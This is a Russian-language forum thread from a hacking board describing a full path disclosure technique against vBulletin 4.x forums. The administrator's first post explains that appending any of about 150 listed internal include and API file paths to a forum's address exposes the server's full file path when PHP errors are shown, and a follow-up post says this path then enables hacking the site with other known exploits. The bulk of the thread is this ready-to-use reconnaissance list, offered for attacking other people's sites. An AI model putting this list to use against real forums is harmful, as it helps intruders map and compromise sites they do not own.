
vBulletin 4.x.x Full Path Disclosure

Тема в разделе vBulletin, создана пользователем ERROR404, 20 дек 2014.

  1. ERROR404 Администратор

    Бывает, что админ форума полный рак в уязвимостях и у него включен показ ошибок PHP, тогда можно узнать полный путь до файла.


    Добавляем любой из перечисленных ниже путей к адресу форума — в сообщении об ошибке PHP будет виден полный путь до файла на сервере.



    /includes/api/commonwhitelist_2.php
    /includes/api/commonwhitelist_5.php
    /includes/api/commonwhitelist_6.php
    /includes/api/1/album_album.php
    /includes/api/1/album_editalbum.php
    /includes/api/1/album_latest.php
    /includes/api/1/album_overview.php
    /includes/api/1/album_picture.php
    /includes/api/1/album_user.php
    /includes/api/1/announcement_edit.php
    /includes/api/1/announcement_view.php
    /includes/api/1/api_cmscategorylist.php
    /includes/api/1/api_cmssectionlist.php
    /includes/api/1/api_forumlist.php
    /includes/api/1/api_getnewtop.php
    /includes/api/1/api_getsecuritytoken.php
    /includes/api/1/api_getsessionhash.php
    /includes/api/1/api_init.php
    /includes/api/1/api_mobilepublisher.php
    /includes/api/1/api_usersearch.php
    /includes/api/1/blog_blog.php
    /includes/api/1/blog_bloglist.php
    /includes/api/1/blog_comments.php
    /includes/api/1/blog_custompage.php
    /includes/api/1/blog_dosendtofriend.php
    /includes/api/1/blog_list.php
    /includes/api/1/blog_members.php
    /includes/api/1/blog_post_comment.php
    /includes/api/1/blog_post_editblog.php
    /includes/api/1/blog_post_editcomment.php
    /includes/api/1/blog_post_edittrackback.php
    /includes/api/1/blog_post_newblog.php
    /includes/api/1/blog_post_postcomment.php
    /includes/api/1/blog_post_updateblog.php
    /includes/api/1/blog_sendtofriend.php
    /includes/api/1/blog_subscription_entrylist.php
    /includes/api/1/blog_subscription_userlist.php
    /includes/api/1/blog_usercp_addcat.php
    /includes/api/1/blog_usercp_editcat.php
    /includes/api/1/blog_usercp_editoptions.php
    /includes/api/1/blog_usercp_editprofile.php
    /includes/api/1/blog_usercp_modifycat.php
    /includes/api/1/blog_usercp_updateprofile.php
    /includes/api/1/editpost_editpost.php
    /includes/api/1/editpost_updatepost.php
    /includes/api/1/forum.php
    /includes/api/1/forumdisplay.php
    /includes/api/1/inlinemod_domergeposts.php
    /includes/api/1/list.php
    /includes/api/1/login_lostpw.php
    /includes/api/1/member.php
    /includes/api/1/memberlist_search.php
    /includes/api/1/misc_showattachments.php
    /includes/api/1/misc_whoposted.php
    /includes/api/1/newreply_newreply.php
    /includes/api/1/newreply_postreply.php
    /includes/api/1/newthread_postthread.php
    /includes/api/1/newthread_newthread.php
    /includes/api/1/poll_newpoll.php
    /includes/api/1/poll_polledit.php
    /includes/api/1/poll_showresults.php
    /includes/api/1/private_editfolders.php
    /includes/api/1/private_insertpm.php
    /includes/api/1/private_messagelist.php
    /includes/api/1/private_newpm.php
    /includes/api/1/private_showpm.php
    /includes/api/1/private_trackpm.php
    /includes/api/1/profile_editattachments.php
    /includes/api/1/profile_editoptions.php
    /includes/api/1/profile_editprofile.php
    /includes/api/1/register_addmember.php
    /includes/api/1/register_checkdate.php
    /includes/api/1/search_process.php
    /includes/api/1/search_showresults.php
    /includes/api/1/showthread.php
    /includes/api/1/subscription_addsubscription.php
    /includes/api/1/subscription_editfolders.php
    /includes/api/1/subscription_viewsubscription.php
    /includes/api/1/threadtag_managetags.php
    /includes/api/2/album_picture.php
    /includes/api/2/api_blogcategorylist.php
    /includes/api/2/blog_blog.php
    /includes/api/2/blog_bloglist.php
    /includes/api/2/blog_list.php
    /includes/api/2/blog_subscription_entrylist.php
    /includes/api/2/blog_subscription_userlist.php
    /includes/api/2/blog_usercp_groups.php
    /includes/api/2/content.php
    /includes/api/2/editpost_editpost.php
    /includes/api/2/forumdisplay.php
    /includes/api/2/member.php
    /includes/api/2/newreply_newreply.php
    /includes/api/2/forum.php
    /includes/api/2/poll_newpoll.php
    /includes/api/2/poll_polledit.php
    /includes/api/2/poll_showresults.php
    /includes/api/2/private_messagelist.php
    /includes/api/2/private_trackpm.php
    /includes/api/2/profile_editattachments.php
    /includes/api/2/search_showresults.php
    /includes/api/2/showthread.php
    /includes/api/3/api_gotonewpost.php
    /includes/api/4/album_user.php
    /includes/api/4/api_forumlist.php
    /includes/api/4/api_getnewtop.php
    /includes/api/4/breadcrumbs_create.php
    /includes/api/4/facebook_getforumid.php
    /includes/api/4/facebook_getnewforummembers.php
    /includes/api/4/get_vbfromfacebook.php
    /includes/api/4/login_facebook.php
    /includes/api/4/newreply_postreply.php
    /includes/api/4/newthread_postthread.php
    /includes/api/4/uc_uc_register.php
    /includes/api/4/register_addmember.php
    /includes/api/4/search_findusers.php
    /includes/api/4/subscription_viewsubscription.php
    /includes/api/5/api_init.php
    /includes/api/6/api_getnewtop.php
    /includes/api/6/api_gotonewpost.php
    /includes/api/6/content.php
    /includes/api/6/member.php
    /includes/api/6/newthread_newthread.php
    /includes/block/blogentries.php
    /includes/block/cmsarticles.php
    /includes/block/html.php
    /includes/block/newposts.php
    /includes/block/sgdiscussions.php
    /includes/block/tagcloud.php
    /includes/block/threads.php
    /forumrunner/include/subscriptions.php
    /forumrunner/include/search_forum.php
    /forumrunner/include/profile.php
    /forumrunner/include/post.php
    /forumrunner/include/pms.php
    /forumrunner/include/online.php
    /forumrunner/include/moderation.php
    /forumrunner/include/misc.php
    /forumrunner/include/login.php
    /forumrunner/include/get_thread.php
    /forumrunner/include/get_forum.php
    /forumrunner/include/cms.php
    /forumrunner/include/attach.php
    /forumrunner/include/announcement.php
    /forumrunner/include/album.php
    /forumrunner/support/vbulletin_methods.php
    /forumrunner/support/stringparser_bbcode.class.php
    /forumrunner/support/utils.php
    /forumrunner/support/other_methods.php
    /packages/skimlinks/hooks/postbit_display_complete.php
    /packages/skimlinks/hooks/showthread_complete.php 
    /packages/skimlinks/hooks/userdata_start.php
    [/CODE]
     
    20 дек 2014 #1
  2. ERROR404 Администратор

    Там вывод ошибок отключён.


    Зная полный путь, можно взломать сайт через другой известный эксплоит: просто некоторым скриптам требуется полный путь.
     
    20 дек 2014 #2